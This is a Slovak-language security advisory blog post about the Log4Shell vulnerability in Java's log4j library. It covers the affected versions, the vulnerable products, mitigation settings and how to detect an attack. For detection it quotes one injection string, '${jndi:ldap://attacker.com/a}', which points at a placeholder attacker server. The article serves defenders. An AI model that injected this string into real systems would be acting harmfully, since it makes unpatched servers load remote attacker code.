Log4Shell (CVE-2021-44228) Bol zverejnený exploit pre RCE zraniteľnosť v log4j knižnici pre Java

Log4Shell (CVE-2021-44228) Bol zverejnený exploit pre RCE zraniteľnosť v log4j knižnici pre Java

Log4Shell (CVE-2021-44228): Bol zverejnený exploit pre RCE zraniteľnosť v log4j knižnici pre Java

Pred necelým dňom bol zverejnený exploit na zraniteľnosť v populárnej knižnici log4j umožňujúci neautentifikovaným útočníkom spustenie škodlivého kódu (RCE - Remote Code Execution) jednoducho, prostredníctvom zalogovania používateľského vstupu obsahujúceho špecifický textový reťazec.

Vzhľadom na fakt že sa jedná o najpoužívanejšiu knižnicu pre logovanie pre Java, je použitá v obrovskom množste (takmer v každej) java aplikácii, či už priamo alebo prostredníctvom inej knižnice, a tieto sa tak v štandardnej konfigurácii stávajú automaticky zraniteľnými. Hoci primárne obavy ako aj útoky smerujú k zraniteľnostiam webových aplikácií, je dôležité poznamenať že zraniteľnosť sa týka aj desktopových aplikácií ktoré budú cielené formou sociálnych útokov so škodlivými súbormi.

Zraniteľnosť bola publikovaná na siet twitter spolu s ukážkou zneužitia zraniteľnosti (PoC exploit) zverejnenou na GitHub. Neskôr bol zraniteľnosti pridelený identifikátor CVE-2021-44228, ako aj prezývka “Log4Shell”.

Som zraniteľný?

Zraniteľné sú všetky verzie knižnice log4j v rozsahu 2.0 <= Apache log4j <= 2.14.1.

V prípade ak používate verzie JDK vyššie ako 6u211, 7u201, 8u191, a 11.0.1 nemali by ste byť zraniteľný, nakoľko v týchto verziách nieje vo východzej konfigurácii povolené načítavanie JNDI objektov cez LDAP.

Aktuálny zoznam zraniteľných aplikácií a služieb je naozaj rozsiahly. Zahŕňa služby spločností ako sú Apple, Steam, Tencent, Baidu, CloudFlare, Amazon. Produkty ako Apache Solr, Apache Druid, Apache Struts2, ElasticSearch. Ako aj aplikácie klientské aplikácie ako Minecraft či Ghidra.

Narastajúci, komunitou aktualizovaný zoznam zraniteľných služieb a aplikácii je možné sledovať na githube.

Čo mám robiť?

Aktualizovať na dnes vydanú verziu 2.15.0 log4j-core.jar. Už je dostupný Maven Central, vrátane release notes a log4j security announcements.

Ak nieje možné pre vás ihneď aktualizovať túto knižnicu, odporúčame ako alternatívnu rýchlu nápravu nasledovné kroky, ktoré je vhodné vykonať dodatočne aj popri aktualizácii knižnice.

  • Pre log4j (od verzie 2.10.0) nastaviť voľbu formatMsgNoLookups=true
  • Pre JDK nastaviť voľbu com.sun.jndi.ldap.object.trustURLCodebase=false
  • Zakázať odchodzie spojenia zo servera, nielen na službu ldap (389/tcp) a ldaps (636/tcp), čo je celkovo odporúčaná praktika

Ako identifikujem útok?

V aplikačných logoch hľadajte reťazec vo formáte ${jndi:ldap://attacker.com/a}, kde attacker.com/a reprezentuje adresu útočníkovho servera.

Ďalšie zdroje a referencie

Informácie obsiahnuté v tomto článku vychádzajú z rôznych zdrojov, vrátane prvotnej analýzy zraniteľnosti od Lunasec a oznámenia zraniteľnosti od randori.

Ďalšie použité zdroje

  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://www.randori.com/blog/cve-2021-44228/
  • https://issues.apache.org/jira/browse/LOG4J2-2109
  • https://github.com/apache/logging-log4j2/pull/607/files
  • https://issues.apache.org/jira/browse/LOG4J2-3198
  • https://github.com/tangxiaofeng7/apache-log4j-poc
  • https://github.com/apache/logging-log4j2/pull/608
  • https://twitter.com/dzikoysk/status/1469091718867951618
  • https://github.com/YfryTchsGD/Log4jAttackSurface

O autorovi

Citadelo
Citadelo
Citadelo je dom plný etických hackerov na vašej strane. Pomáhame otestovať ich informačnú bezpečnosť. Podrobte svoje IT prostredie výzve a odhaľte, do akej miery sú vaše citlivé dáta chránené.
Zobraziť viac od autora

Podobné blogy